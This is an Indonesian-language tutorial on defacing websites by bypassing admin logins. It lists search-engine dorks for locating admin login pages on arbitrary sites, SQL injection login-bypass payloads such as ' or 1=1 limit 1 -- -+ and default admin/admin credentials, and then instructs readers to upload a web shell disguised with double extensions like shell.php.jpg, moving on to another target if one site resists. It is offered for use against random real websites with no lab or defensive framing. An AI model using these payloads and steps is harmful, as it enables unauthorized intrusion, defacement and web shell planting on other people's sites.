Cara deface poc bypass admin



Assalamualaikum? , kali ini gw bakal ngeshare deface metode Bypass Admin

Dork :
inurl:/admin/Admin.php intext:login
inurl:/administrator/login.php intext:username
inurl:/login.php intext:administrator intext:login
Sisanya bisa kalian kembangkan dengan otak cerdas anda:)

Step 1 :
Pertama lu dorking dulu make dork diatas atau dengan Dork anda yg sudah di kembangkan

Step 2 :
Pilih salah satu site, dan maka akan muncul tampilan login


Kalian isi dengan
User : '=''or' atau ' or 1=1 limit 1 -- -+
Pass : '=''or' atau  ' or 1=1 limit 1 -- -+
User:'="or'
Pass:'="or'
User:admin
Pass:admin

Jika web nya vuln maka kita akan masuk ke Dashboard, jika tidak maka cari target lain





tiggal upload shell aja deh, kalo ga bisa coba kalian bypass dulu ext nya.
contoh : shell.php.jpg
              shell.php.jpeg
Note : Jangan tebas index bro, dosa lu tanggung sendiri
Ok sampai sini dulu tutorial dari gw. Jangan Lupa Senyum Hari Ini :)